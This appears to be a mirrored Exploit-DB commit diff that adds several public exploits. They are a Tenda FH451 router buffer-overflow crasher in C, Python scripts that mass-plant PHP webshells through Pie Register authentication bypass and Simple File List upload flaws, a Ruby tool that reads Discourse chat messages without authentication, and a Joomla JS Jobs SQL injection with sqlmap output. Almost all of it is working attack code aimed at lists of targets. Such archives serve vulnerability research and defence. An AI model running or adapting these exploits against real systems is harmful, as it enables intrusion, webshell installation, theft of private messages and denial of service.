bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2025-07-23

Browse source 
13 changes to exploits/shellcodes/ghdb

Tenda FH451 1.0.0.9 Router - Stack-based Buffer Overflow

Discourse 3.1.1 - Unauthenticated Chat Message Access

Pie Register WordPress Plugin 3.7.1.4 - Authentication Bypass to RCE

Simple File List WordPress Plugin 4.2.2 - File Upload to RCE

Joomla JS Jobs plugin 1.4.2 - SQL injection
LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Department Assignment Alias Nick Field
LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Facebook Integration Page Name Field
LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Operator Surname
LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Personal Canned Messages
LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Telegram Bot Username
LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via the Chat Transfer Function

Microsoft Edge Windows 10 Version 1511 - Cross Site Scripting (XSS)
This commit is contained in:
Exploit-DB 2025-07-23 00:16:47 +00:00
parent 08e51ef2f9
commit 599853959f
13 changed files with 1647 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

381
exploits/multiple/remote/52374.c Normal file
View file

@ -0,0 +1,381 @@
/*
* Title : Tenda FH451 1.0.0.9 Router - Stack-based Buffer Overflow
* Author : Byte Reaper
* Telegram : @ByteReaper0
* CVE : CVE-2025-7795
* Vulnerability : Buffer Overflow
* Description :
* A buffer overflow vulnerability affecting certain Tenda routers,
* exploitable via an unauthenticated POST request to an unprotected endpoint, leading to service crash.
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include "argparse.h"
#include <arpa/inet.h>
#include <stdlib.h>
#include <curl/curl.h>
#include <sys/wait.h>
#define FULL_URL 2500
#define POST_DATA 10000
const char *targetUrl = NULL;
const char *targetip = NULL;
int selectIp = 0;
int selectUrl = 0;
int verbose = 0;
int showOne = 0;
char postData[POST_DATA];
struct Mem
{
char *buffer;
size_t len;
};
size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata)
{
size_t total = size * nmemb;
struct Mem *m = (struct Mem *)userdata;
char *tmp = realloc(m->buffer, m->len + total + 1);
if (!tmp) return 0;
m->buffer = tmp;
memcpy(&(m->buffer[m->len]), ptr, total);
m->len += total;
m->buffer[m->len] = '\0';
return total;
}
void pingPacket()
{
int pid = fork();
printf("\n============================================== [Ping] ==============================================\n");
if (pid < 0)
{
perror("\e[1;31m[-] Fork Failed!\e[0m");
exit(1);
}
if (pid == 0)
{
printf("\e[1;32m[+] Child Process (Ping) -> PID: %d\e[0m\n",
getpid());
char *const argv[] = { "/bin/ping",
"-c",
"3",
(char *)targetip,
NULL };
char *const envp[] = { NULL };
__asm__ volatile
(
"mov $59, %%rax\n\t"
"mov %[prog], %%rdi\n\t"
"mov %[argv], %%rsi\n\t"
"mov %[envp], %%rdx\n\t"
"syscall\n\t"
"mov $60, %%rax\n\t"
"xor %%rdi, %%rdi\n\t"
"syscall\n\t"
:
: [prog] "r" (argv[0]),
[argv] "r" (argv),
[envp] "r" (envp)
: "rax", "rdi", "rsi", "rdx"
);
}
else
{
printf("\e[1;32m[+] Main PID : %d\e[0m\n",
getpid());
int status;
waitpid(pid,
&status,
0);
if (WIFEXITED(status))
{
int code = WEXITSTATUS(status);
printf("\e[1;33m[+] Ping exited with code: %d\e[0m\n",
code);
if (code == 0)
{
printf("\e[1;31m[-] Successfully confirmed connection via ping!\e[0m\n");
printf("\e[1;31m[-] The server is still working, please try again!\n\e[0m");
}
else
{
printf("\e[1;34m[+] The server is not responding to the ping request!\e[0m\n");
printf("\e[1;34m[+] CVE-2025-7795: Vulnerability confirmed! Server is down.\e[0m\n");
}
}
}
printf("\n============================================================================================\e[0m\n");
}
void sendRequest()
{
CURL *c = curl_easy_init();
CURLcode res;
char full[FULL_URL];
struct Mem response = {NULL, 0};
if (!c) {
printf("\e[1;31m[-] Error Create Object Curl !\e[0m\n");
exit(EXIT_FAILURE);
}
if (targetip) selectIp = 1;
if (targetUrl) selectUrl = 1;
if (selectIp)
{
snprintf(full,
sizeof(full),
"http://%s/goform/fromP2pListFilter",
targetip);
}
if (selectUrl)
{
snprintf(full,
sizeof(full),
"%s/goform/fromP2pListFilter",
targetUrl);
}
int rounds = 5;
int baseLen = 3500, step = 1000;
showOne = 1;
for (int i = 0; i < rounds; i++)
{
int len = baseLen + i * step;
if (len + 6 >= sizeof(postData)) break;
snprintf(postData, sizeof(postData), "list=");
memset(postData + 5, 'A', len);
postData[5 + len] = '\0';
printf("\e[1;34m[%d] Iteration %d - Length: %d\e[0m\n",
i+1,
i+1,
len);
if (verbose)
{
printf("\e[1;35m\n====================================================================[Post Data] ====================================================================\e[0m\n");
printf("%s\e[0m\n\n", postData);
printf("\e[1;35m====================================================================[Post Data] ====================================================================\e[0m\n");
}
curl_easy_reset(c);
curl_easy_setopt(c,
CURLOPT_URL,
full);
curl_easy_setopt(c,
CURLOPT_ACCEPT_ENCODING,
"");
curl_easy_setopt(c,
CURLOPT_FOLLOWLOCATION,
1L);
curl_easy_setopt(c,
CURLOPT_POST,
1L);
curl_easy_setopt(c,
CURLOPT_POSTFIELDS,
postData);
curl_easy_setopt(c,
CURLOPT_POSTFIELDSIZE,
(long)strlen(postData));
curl_easy_setopt(c,
CURLOPT_WRITEFUNCTION,
write_cb);
curl_easy_setopt(c,
CURLOPT_WRITEDATA,
&response);
curl_easy_setopt(c,
CURLOPT_CONNECTTIMEOUT,
5L);
curl_easy_setopt(c,
CURLOPT_TIMEOUT,
10L);
curl_easy_setopt(c,
CURLOPT_SSL_VERIFYPEER,
0L);
curl_easy_setopt(c,
CURLOPT_SSL_VERIFYHOST,
0L);
struct curl_slist *h = NULL;
h = curl_slist_append(h,
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
h = curl_slist_append(h,
"Accept-Encoding: gzip, deflate, br");
h = curl_slist_append(h,
"Accept-Language: en-US,en;q=0.5");
h = curl_slist_append(h,
"Connection: keep-alive");
h = curl_slist_append(h,
"Referer: http://example.com");
h = curl_slist_append(h,
"Cache-Control: no-cache");
h = curl_slist_append(h,
"Pragma: no-cache");
curl_easy_setopt(c, CURLOPT_HTTPHEADER, h);
if (verbose) curl_easy_setopt(c, CURLOPT_VERBOSE, 1L);
char *encode1 = curl_easy_escape(c, full, 0);
if (!encode1)
{
printf("\e[1;31m[-] URL encoding failed for payload\e[0m\n");
exit(EXIT_FAILURE);
}
if (verbose && showOne)
{
printf("\e[1;37m=========================================");
if (selectUrl) printf("\e[1;37m[+] Input Url : %s\e[0m\n[+] Encode Url : %s\e[0m\n[+] full format Url : %s\e[0m\n",
targetUrl,
encode1,
full);
if (selectIp) printf("\e[1;37m[+] Input Ip : %s\e[0m\n[+] full format Url : %s\e[0m\n",
targetip,
full);
printf("=========================================");
showOne = 0;
}
res = curl_easy_perform(c);
curl_slist_free_all(h);
curl_free(encode1);
if (response.buffer)
{
free(response.buffer);
response.buffer = NULL;
response.len = 0;
}
if (res == CURLE_OK)
{
long httpCode = 0;
printf("\e[1;36m[+] Request sent successfully\e[0m\n");
curl_easy_getinfo(c, CURLINFO_RESPONSE_CODE,
&httpCode);
printf("\e[1;32m[+] Http Code Response : %ld\e[0m\n",
httpCode);
if (httpCode >= 200 && httpCode < 300)
{
printf("\e[1;31m[-] The server was not affected, still working !\n");
printf("\e[1;33m-------------------------------- Response Server --------------------------------\e[0m\n");
printf("%s\e[0m\n",
response.buffer);
printf("\e[1;33m-----------------------------------------------------------------------------------\e[0m\n");
}
else
{
printf("\e[1;34m[+] Negative server response. I started trying to confirm the connection...\e[0m\n");
printf("[+] Run Command Ping For Check Connection : \e[0m\n");
if (selectIp) pingPacket();
else printf("[-] Error Run Command Ping for URl !\e[0m\n[-] Please Enter Target Ip for Check Connection !\e[0m\n");
}
}
else
{
printf("[-] Error Send Request, Please Check Your Connection !\e[0m\n");
printf("[-] Error : %s\n", curl_easy_strerror(res));
}
}
free(response.buffer);
curl_easy_cleanup(c);
}
int main(int argc,
const char **argv)
{
printf(
"\e[1;31m"
"▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▄▖▄▖▄▖▄▖ \n"
"▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖ ▌ ▌▙▌▙▖ \n"
"▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ ▌ ▌▄▌▄▌ \n"
" \e[1;37mByte Reaper\e[0m\n"
);
printf("\e[1;37m---------------------------------------------------------------------------------------------------------------------------------\e[0m\n");
if (getuid() != 0)
{
printf("===================================================\e[0m\n");
printf("[-] Not running as root. Trying with sudo...\e[0m\n");
char *args[] = {(char*)"sudo",
(char*)"./exploit",
NULL};
execvp("sudo", args);
perror("[-] Error Run Exploit in Root !");
__asm__ volatile
(
"mov $0x3C, %%rax\n\t"
"xor %%rdi, %%rdi\n\t"
"syscall\n\t"
:
:
: "rdi"
);
}
printf("\e[1;36m[+] Running as root! Exploit continues...\e[0m\n");
printf("===================================================\e[0m\n");
struct argparse_option options[] =
{
OPT_HELP(),
OPT_STRING('i',
"ip",
&targetip,
"Enter Target IP"),
OPT_STRING('u',
"url",
&targetUrl,
"Enter Target URL"),
OPT_BOOLEAN('v',
"verbose",
&verbose,
"Verbose Mode"),
OPT_END(),
};
struct argparse argparse;
argparse_init(&argparse,
options,
NULL,
0);
argparse_parse(&argparse,
argc,
argv);
if (!targetip && !targetUrl)
{
printf("\e[1;33m[-] Please Enter Target IP OR URl !\e[0m\n");
printf("\e[1;33m[!] Exemple : ./exploit -u http://ROUTER_IP\e[0m\n");
printf("[+] OR \n");
printf("\e[1;33m[!] Exemple : ./exploit -i ROUTER_IP\e[0m\n");
__asm__ volatile(
"xor %%rdi, %%rdi\n\t"
"mov $0x3C, %%rax\n\t"
"1:\n\t"
"syscall\n\t"
:
:
: "rax", "rdi", "rsi"
);
}
if (targetip && targetUrl)
{
printf("[+] Please Enter Traget URL OR Traget Ip address, Exit...\e[0m\n");
__asm__ volatile
(
"mov $0x3C, %%rax\n\t"
"xor %%rdi, %%rdi\n\t"
"syscall\n\t"
:
:
:"rdi"
);
}
if (selectIp)
{
sendRequest();
}
else
{
sendRequest();
}
return 0;
}

90
exploits/multiple/webapps/52370.py Executable file
View file

@ -0,0 +1,90 @@
# Exploit Title: Pie Register WordPress Plugin 3.7.1.4 - Authentication Bypass to RCE
# Google Dork: inurl:/wp-content/plugins/pie-register/
# Date: 2025-07-09
# Exploit Author: Md Amanat Ullah (xSwads)
# Vendor Homepage: https://wordpress.org/plugins/pie-register/
# Software Link:
https://downloads.wordpress.org/plugin/pie-register.3.7.1.4.zip
# Version: <= 3.7.1.4
# Tested on: Ubuntu 22.04
# CVE: CVE-2025-34077
#!/usr/bin/env python3
import requests
import zipfile
import io
import sys
from concurrent.futures import ThreadPoolExecutor, as_completed
from colorama import Fore, Style, init
from threading import Lock
init(autoreset=True)
SHELL_PHP = "<?php if(isset($_GET['cmd'])) echo shell_exec($_GET['cmd']); ?>"
PLUGIN_DIR = "evilplugin"
ZIP_NAME = "evilplugin.zip"
SHELL_FILE = "shell.php"
OUTPUT_FILE = "Shells.txt"
HEADERS = {'User-Agent': 'Mozilla/5.0'}
TIMEOUT = 10
lock = Lock()
def FilterURLS(site):
site = site.strip()
if not site.startswith(('http://', 'https://')):
site = 'http://' + site
if not site.endswith('/'):
site += '/'
return site
def make_shell_zip():
buf = io.BytesIO()
with zipfile.ZipFile(buf, 'w') as z:
z.writestr(f"{PLUGIN_DIR}/{PLUGIN_DIR}.php", "<?php /* Plugin */ ?>")
z.writestr(f"{PLUGIN_DIR}/{SHELL_FILE}", SHELL_PHP)
buf.seek(0)
return buf
def exploit(target):
target = FilterURLS(target)
session = requests.Session()
data = {"social_site": "true", "user_id_social_site": "1"}
try:
r = session.post(f"{target}?pr_social_login=1", data=data, headers=HEADERS, timeout=TIMEOUT)
except:
print(f"{Fore.RED}[Failed] - {target}")
return
if not session.cookies:
print(f"{Fore.RED}[Failed] - {target}")
return
files = {"pluginzip": (ZIP_NAME, make_shell_zip(), "application/zip")}
try:
upload = session.post(f"{target}wp-admin/plugin-install.php?upload", files=files, headers=HEADERS, timeout=TIMEOUT)
except:
print(f"{Fore.RED}[Failed] - {target}")
return
if "Plugin installed successfully" in upload.text:
shell_url = f"{target}wp-content/plugins/{PLUGIN_DIR}/{SHELL_FILE}"
print(f"{Fore.GREEN}[Exploited] - {shell_url}")
with lock:
with open(OUTPUT_FILE, "a") as f:
f.write(shell_url + "\n")
else:
print(f"{Fore.RED}[Failed] - {target}")
def main(targets_file):
with open(targets_file, "r") as f:
targets = [line.strip() for line in f if line.strip()]
with ThreadPoolExecutor(max_workers=100) as executor:
futures = [executor.submit(exploit, target) for target in targets]
for _ in as_completed(futures):
pass
if __name__ == "__main__":
if len(sys.argv) != 2:
print(f"Usage: {sys.argv[0]} list.txt")
sys.exit(1)
main(sys.argv[1])

103
exploits/multiple/webapps/52371.py Executable file
View file

@ -0,0 +1,103 @@
# Exploit Title: Simple File List WordPress Plugin 4.2.2 - File Upload to RCE
# Google Dork: inurl:/wp-content/plugins/simple-file-list/
# Date: 2025-07-15
# Exploit Author: Md Amanat Ullah (xSwads)
# Vendor Homepage: https://wordpress.org/plugins/simple-file-list/
# Software Link:
https://downloads.wordpress.org/plugin/simple-file-list.4.2.2.zip
# Version: <= 4.2.2
# Tested on: Ubuntu 22.04
# CVE: CVE-2020-36847
#!/usr/bin/env python3
import requests
import sys, os
from concurrent.futures import ThreadPoolExecutor, as_completed
from urllib.parse import urljoin
from colorama import Fore, init
init(autoreset=True)
HEADERS = {'User-Agent': 'Mozilla/5.0'}
PHP_PAYLOAD = "<?php echo 'Vuln!!!'; ?>"
UPLOAD_PATH = "wp-content/plugins/simple-file-list/ee-upload-engine.php"
RENAME_PATH = "wp-content/plugins/simple-file-list/ee-file-engine.php"
UPLOAD_FOLDER = "wp-content/uploads/simple-file-list/"
def FilterURLS(site):
site = site.strip()
if not site.startswith(('http://', 'https://')):
site = 'http://' + site
if not site.endswith('/'):
site += '/'
return site
def upload_payload(base):
upload_url = urljoin(base, UPLOAD_PATH)
try:
files = {'file': ('pwn.png', PHP_PAYLOAD, 'image/png')}
r = requests.post(upload_url, files=files, headers=HEADERS, timeout=10, verify=False)
r.raise_for_status()
result = r.json()
return result.get('file')
except Exception:
return None
def rename_payload(base, filename):
rename_url = urljoin(base, RENAME_PATH)
try:
new_name = filename[:-4] + '.php'
data = {'oldFile': filename, 'newFile': new_name}
r = requests.post(rename_url, data=data, headers=HEADERS, timeout=10, verify=False)
r.raise_for_status()
result = r.json()
return result.get('newFile')
except Exception:
return None
def exploit(site):
base = FilterURLS(site)
try:
filename = upload_payload(base)
if not filename:
print(Fore.RED + f"[Failed] - {site}")
return
newfile = rename_payload(base, filename)
if not newfile:
print(Fore.RED + f"[Failed] - {site}")
return
shell_url = urljoin(base, UPLOAD_FOLDER + newfile)
r = requests.get(shell_url, headers=HEADERS, timeout=10, verify=False)
if r.status_code == 200:
print(Fore.GREEN + f"[Exploited] - {shell_url}")
with open("shells_found.txt", "a") as f:
f.write(shell_url + "\n")
else:
print(Fore.RED + f"[Failed] - {site}")
except Exception:
print(Fore.RED + f"[Failed] - {site}")
def main():
if len(sys.argv) != 2:
print(f"Usage: {sys.argv[0]} list.txt")
sys.exit(1)
targets_file = sys.argv[1]
if not os.path.isfile(targets_file):
print(f"File {targets_file} not found.")
sys.exit(1)
with open(targets_file) as f:
targets = [line.strip() for line in f if line.strip()]
with ThreadPoolExecutor(max_workers=100) as executor:
futures = [executor.submit(exploit, target) for target in targets]
for _ in as_completed(futures):
pass
if __name__ == "__main__":
requests.packages.urllib3.disable_warnings()
main()

565
exploits/multiple/webapps/52375.rb Executable file
View file

@ -0,0 +1,565 @@
#!/usr/bin/env ruby
# Title : Discourse 3.1.1 - Unauthenticated Chat Message Access
# CVE-2023-45131
# CVSS: 7.5 (High)
# Affected: Discourse < 3.1.1 stable, < 3.2.0.beta2
# Author ibrahimsql @ https://twitter.com/ibrahmsql
# Date: 2023-12-14
require 'net/http'
require 'uri'
require 'json'
require 'openssl'
require 'base64'
class CVE202345131
def initialize(target_url)
@target_url = target_url.chomp('/')
@results = []
@message_bus_client_id = nil
@csrf_token = nil
end
def run_exploit
puts "\n[*] Testing CVE-2023-45131: Discourse Unauthenticated Chat Message Access"
puts "[*] Target: #{@target_url}"
puts "[*] CVSS Score: 7.5 (High)"
puts "[*] Affected: Discourse < 3.1.1 stable, < 3.2.0.beta2\n"
# Test MessageBus access
test_messagebus_access
test_chat_channel_enumeration
test_private_message_access
test_real_time_monitoring
test_message_history_access
test_user_enumeration_via_chat
generate_report
@results
end
private
def test_messagebus_access
puts "[*] Testing MessageBus unauthenticated access..."
begin
# Get MessageBus client ID
uri = URI("#{@target_url}/message-bus/poll")
response = make_request(uri, 'GET')
if response && response.code == '200'
begin
data = JSON.parse(response.body)
if data.is_a?(Array) && !data.empty?
@message_bus_client_id = extract_client_id(response)
@results << {
vulnerability: "MessageBus Access",
severity: "High",
description: "Unauthenticated access to MessageBus endpoint confirmed",
impact: "Can monitor real-time messages and notifications",
client_id: @message_bus_client_id
}
puts "[+] MessageBus access confirmed - Client ID: #{@message_bus_client_id}"
return true
end
rescue JSON::ParserError
# Try alternative endpoints
test_alternative_messagebus_endpoints
end
end
rescue => e
puts "[!] Error testing MessageBus access: #{e.message}"
end
false
end
def test_alternative_messagebus_endpoints
puts "[*] Testing alternative MessageBus endpoints..."
endpoints = [
"/message-bus/poll",
"/message-bus/subscribe",
"/message-bus/diagnostics",
"/message-bus/long-poll"
]
endpoints.each do |endpoint|
begin
uri = URI("#{@target_url}#{endpoint}")
response = make_request(uri, 'GET')
if response && response.code == '200'
if response.body.include?('message-bus') || response.body.include?('clientId')
@results << {
vulnerability: "Alternative MessageBus Endpoint",
severity: "Medium",
endpoint: endpoint,
description: "Alternative MessageBus endpoint accessible",
impact: "Potential message monitoring capability"
}
puts "[+] Alternative endpoint accessible: #{endpoint}"
end
end
rescue => e
puts "[!] Error testing endpoint #{endpoint}: #{e.message}"
end
end
end
def test_chat_channel_enumeration
puts "[*] Testing chat channel enumeration..."
return unless @message_bus_client_id
begin
# Try to enumerate chat channels
uri = URI("#{@target_url}/message-bus/poll")
# Subscribe to chat channels
data = {
'/chat/new-messages' => -1,
'/chat/channel-status' => -1,
'/chat/user-tracking' => -1,
'clientId' => @message_bus_client_id
}
response = make_request(uri, 'POST', data)
if response && response.code == '200'
begin
messages = JSON.parse(response.body)
if messages.is_a?(Array) && !messages.empty?
chat_channels = extract_chat_channels(messages)
if !chat_channels.empty?
@results << {
vulnerability: "Chat Channel Enumeration",
severity: "High",
channels: chat_channels,
description: "Enumerated accessible chat channels",
impact: "Can identify active chat channels and participants"
}
puts "[+] Chat channels enumerated: #{chat_channels.join(', ')}"
end
end
rescue JSON::ParserError => e
puts "[!] Error parsing chat channel response: #{e.message}"
end
end
rescue => e
puts "[!] Error enumerating chat channels: #{e.message}"
end
end
def test_private_message_access
puts "[*] Testing private message access..."
return unless @message_bus_client_id
begin
# Try to access private messages
uri = URI("#{@target_url}/message-bus/poll")
# Subscribe to private message channels
data = {
'/private-messages' => -1,
'/chat/private' => -1,
'/notification' => -1,
'clientId' => @message_bus_client_id
}
response = make_request(uri, 'POST', data)
if response && response.code == '200'
begin
messages = JSON.parse(response.body)
if messages.is_a?(Array)
private_messages = extract_private_messages(messages)
if !private_messages.empty?
@results << {
vulnerability: "Private Message Access",
severity: "Critical",
messages: private_messages,
description: "Accessed private chat messages without authentication",
impact: "Complete breach of private communication confidentiality"
}
puts "[+] Private messages accessed: #{private_messages.length} messages found"
# Log sample messages (redacted)
private_messages.first(3).each_with_index do |msg, idx|
puts " [#{idx + 1}] #{redact_message(msg)}"
end
end
end
rescue JSON::ParserError => e
puts "[!] Error parsing private message response: #{e.message}"
end
end
rescue => e
puts "[!] Error accessing private messages: #{e.message}"
end
end
def test_real_time_monitoring
puts "[*] Testing real-time message monitoring..."
return unless @message_bus_client_id
begin
puts "[*] Monitoring for 10 seconds..."
start_time = Time.now
monitored_messages = []
while (Time.now - start_time) < 10
uri = URI("#{@target_url}/message-bus/poll")
data = {
'/chat/new-messages' => 0,
'clientId' => @message_bus_client_id
}
response = make_request(uri, 'POST', data)
if response && response.code == '200'
begin
messages = JSON.parse(response.body)
if messages.is_a?(Array) && !messages.empty?
new_messages = extract_new_messages(messages)
monitored_messages.concat(new_messages)
end
rescue JSON::ParserError
# Continue monitoring
end
end
sleep(1)
end
if !monitored_messages.empty?
@results << {
vulnerability: "Real-time Message Monitoring",
severity: "High",
messages_count: monitored_messages.length,
description: "Successfully monitored real-time chat messages",
impact: "Can intercept live communications"
}
puts "[+] Real-time monitoring successful: #{monitored_messages.length} messages intercepted"
else
puts "[-] No real-time messages detected during monitoring period"
end
rescue => e
puts "[!] Error during real-time monitoring: #{e.message}"
end
end
def test_message_history_access
puts "[*] Testing message history access..."
begin
# Try to access message history through various endpoints
history_endpoints = [
"/chat/api/channels",
"/chat/api/messages",
"/chat/history",
"/api/chat/channels.json"
]
history_endpoints.each do |endpoint|
uri = URI("#{@target_url}#{endpoint}")
response = make_request(uri, 'GET')
if response && response.code == '200'
begin
data = JSON.parse(response.body)
if data.is_a?(Hash) && (data['messages'] || data['channels'] || data['chat'])
@results << {
vulnerability: "Message History Access",
severity: "High",
endpoint: endpoint,
description: "Accessed chat message history without authentication",
impact: "Historical chat data exposure"
}
puts "[+] Message history accessible via: #{endpoint}"
end
rescue JSON::ParserError
# Check for HTML responses that might contain chat data
if response.body.include?('chat') && response.body.include?('message')
@results << {
vulnerability: "Message History Exposure",
severity: "Medium",
endpoint: endpoint,
description: "Chat-related content found in response",
impact: "Potential information disclosure"
}
puts "[+] Chat-related content found in: #{endpoint}"
end
end
end
end
rescue => e
puts "[!] Error testing message history access: #{e.message}"
end
end
def test_user_enumeration_via_chat
puts "[*] Testing user enumeration via chat features..."
begin
# Try to enumerate users through chat-related endpoints
user_endpoints = [
"/chat/api/users",
"/chat/users.json",
"/api/chat/users",
"/chat/members"
]
user_endpoints.each do |endpoint|
uri = URI("#{@target_url}#{endpoint}")
response = make_request(uri, 'GET')
if response && response.code == '200'
begin
data = JSON.parse(response.body)
if data.is_a?(Hash) && (data['users'] || data['members'])
users = extract_users_from_chat(data)
if !users.empty?
@results << {
vulnerability: "User Enumeration via Chat",
severity: "Medium",
endpoint: endpoint,
users_count: users.length,
sample_users: users.first(5),
description: "Enumerated chat users without authentication",
impact: "User information disclosure"
}
puts "[+] Users enumerated via #{endpoint}: #{users.length} users found"
end
end
rescue JSON::ParserError
# Continue with next endpoint
end
end
end
rescue => e
puts "[!] Error testing user enumeration: #{e.message}"
end
end
def extract_client_id(response)
# Extract client ID from response headers or body
if response['X-MessageBus-Client-Id']
return response['X-MessageBus-Client-Id']
end
# Try to extract from response body
begin
data = JSON.parse(response.body)
if data.is_a?(Hash) && data['clientId']
return data['clientId']
end
rescue JSON::ParserError
end
# Generate a random client ID
SecureRandom.hex(16)
end
def extract_chat_channels(messages)
channels = []
messages.each do |message|
if message.is_a?(Hash)
if message['channel'] && message['channel'].include?('/chat/')
channels << message['channel']
elsif message['data'] && message['data'].is_a?(Hash)
if message['data']['channel_id']
channels << "Channel #{message['data']['channel_id']}"
end
end
end
end
channels.uniq
end
def extract_private_messages(messages)
private_msgs = []
messages.each do |message|
if message.is_a?(Hash)
if message['channel'] && (message['channel'].include?('/private') || message['channel'].include?('/chat/private'))
private_msgs << {
channel: message['channel'],
data: message['data'],
timestamp: message['timestamp'] || Time.now.to_i
}
elsif message['data'] && message['data'].is_a?(Hash)
if message['data']['message'] || message['data']['content']
private_msgs << {
content: message['data']['message'] || message['data']['content'],
user: message['data']['user'] || message['data']['username'],
timestamp: message['data']['timestamp'] || Time.now.to_i
}
end
end
end
end
private_msgs
end
def extract_new_messages(messages)
new_msgs = []
messages.each do |message|
if message.is_a?(Hash) && message['data']
new_msgs << {
channel: message['channel'],
data: message['data'],
timestamp: Time.now.to_i
}
end
end
new_msgs
end
def extract_users_from_chat(data)
users = []
if data['users'] && data['users'].is_a?(Array)
data['users'].each do |user|
if user.is_a?(Hash)
users << {
username: user['username'],
id: user['id'],
name: user['name']
}
end
end
elsif data['members'] && data['members'].is_a?(Array)
data['members'].each do |member|
if member.is_a?(Hash)
users << {
username: member['username'] || member['user'],
id: member['id'] || member['user_id']
}
end
end
end
users
end
def redact_message(message)
if message.is_a?(Hash)
content = message[:content] || message['content'] || message[:data] || 'N/A'
user = message[:user] || message['user'] || 'Unknown'
"User: #{user}, Content: #{content.to_s[0..50]}..."
else
message.to_s[0..50] + "..."
end
end
def make_request(uri, method = 'GET', data = nil, headers = {})
begin
http = Net::HTTP.new(uri.host, uri.port)
http.use_ssl = (uri.scheme == 'https')
http.verify_mode = OpenSSL::SSL::VERIFY_NONE if http.use_ssl?
http.read_timeout = 10
http.open_timeout = 10
request = case method.upcase
when 'GET'
Net::HTTP::Get.new(uri.request_uri)
when 'POST'
req = Net::HTTP::Post.new(uri.request_uri)
if data
if data.is_a?(Hash)
req.set_form_data(data)
else
req.body = data
req['Content-Type'] = 'application/json'
end
end
req
end
# Set headers
request['User-Agent'] = 'Mozilla/5.0 (compatible; DiscourseMap/2.0)'
request['Accept'] = 'application/json, text/javascript, */*; q=0.01'
request['X-Requested-With'] = 'XMLHttpRequest'
headers.each { |key, value| request[key] = value }
response = http.request(request)
return response
rescue => e
puts "[!] Request failed: #{e.message}"
return nil
end
end
def generate_report
puts "\n" + "="*60
puts "CVE-2023-45131 Exploitation Report"
puts "="*60
puts "Target: #{@target_url}"
puts "Vulnerabilities Found: #{@results.length}"
if @results.empty?
puts "[+] No chat message access vulnerabilities detected"
else
puts "\n[!] VULNERABILITIES DETECTED:"
@results.each_with_index do |result, index|
puts "\n#{index + 1}. #{result[:vulnerability]}"
puts " Severity: #{result[:severity]}"
puts " Description: #{result[:description]}"
puts " Impact: #{result[:impact]}"
if result[:messages_count]
puts " Messages Found: #{result[:messages_count]}"
end
if result[:channels]
puts " Channels: #{result[:channels].join(', ')}"
end
if result[:endpoint]
puts " Endpoint: #{result[:endpoint]}"
end
end
puts "\n[!] REMEDIATION:"
puts "1. Update Discourse to version 3.1.1 stable or 3.2.0.beta2 or later"
puts "2. Implement proper authentication for MessageBus endpoints"
puts "3. Review and restrict access to chat-related APIs"
puts "4. Monitor MessageBus access logs for suspicious activity"
puts "5. Consider disabling chat features if not required"
end
puts "\n" + "="*60
end
end
# Run the exploit if called directly
if __FILE__ == $0
if ARGV.length != 1
puts "Usage: ruby #{$0} <target_url>"
puts "Example: ruby #{$0} https://discourse.example.com"
exit 1
end
target_url = ARGV[0]
exploit = CVE202345131.new(target_url)
exploit.run_exploit
end

65
exploits/php/webapps/52373.txt Normal file
View file

@ -0,0 +1,65 @@
# Exploit Title: Joomla JS Jobs plugin 1.4.2 - SQL injection
# Google Dork: n/a
# Date: 07/07/2025
# Exploit Author: Adam Wallwork
# Vendor Homepage: https://joomsky.com/
# Demo: https://demo.joomsky.com/js-jobs/jm/free/
# Software Link: https://extensions.joomla.org/extension/js-jobs/
# Version: v1.4.2
# Tested on: v1.4.2
An SQL injection vulnerability exists in the JS Jobs extension (v1.4.2) via the 'cvid' parameter and is exploitable as the jobseeker user.
To exploit this vulnerability login as the jobseeker user with default credentials (jobseeker:demo) and go to 'jobseeker-controlpanel >> My Stuff >> Newest Jobs >> Newest Jobs >> Apply Now >> Apply Now' and capture the "Apply Now" request (req.txt).
HTTP Request:
```
POST /index.php?option=com_jsjobs&task=jobapply.jobapplyajax HTTP/2
Host: localhost:8080
Cookie: joomla_user_state=logged_in; 67aa5f9b49e233456b916ea62ef1447b=kjou43pssdvaa5plr84dhc8P64
Content-Length: 38
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-GB,en;q=0.9
Sec-Ch-Ua: "Chromium";v="137", "Not/A)Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/index.php/component/jsjobs/newest-jobs?Itemid=
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
jobid=1&cvid=1&coverletterid=4&uid=460
```
Exploit:
```
sqlmap -r req.txt --dbs --batch -p cvid --dbms=mysql --threads=10
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.1.2#dev}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
---
Parameter: cvid (POST)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: jobid=1&cvid=(SELECT (CASE WHEN (7270=7270) THEN 1 ELSE (SELECT 6098 UNION SELECT 7386) END))&coverletterid=4&uid=460
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: jobid=1&cvid=1 AND (SELECT 6497 FROM (SELECT(SLEEP(5)))EAyv)&coverletterid=4&uid=460
---
available databases [2]:
[*] joomla_db
[*] information_schema
```

32
exploits/php/webapps/52376.txt Normal file
View file

@ -0,0 +1,32 @@
